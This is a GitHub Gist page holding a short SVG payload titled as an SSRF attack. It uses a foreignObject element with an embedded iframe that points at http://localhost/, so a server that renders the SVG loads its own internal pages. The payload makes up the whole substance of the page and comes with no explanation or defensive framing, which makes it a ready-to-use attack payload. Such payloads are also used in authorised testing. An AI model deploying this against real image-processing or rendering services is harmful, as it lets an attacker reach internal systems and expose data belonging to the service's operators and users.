-
-
Save MikeeI/9fba5b3fa75bcf457d0ae944a050ae22 to your computer and use it in GitHub Desktop.
SVG Foreign Objects IFrame SSRF
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<svg width="6000" height="6000"> | |
<g> | |
<foreignObject width="6000" height="6000"> | |
<body xmlns="http://www.w3.org/1999/xhtml"> | |
<iframe src="http://localhost/"></iframe> | |
</body> | |
</foreignObject> | |
</g> | |
</svg> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment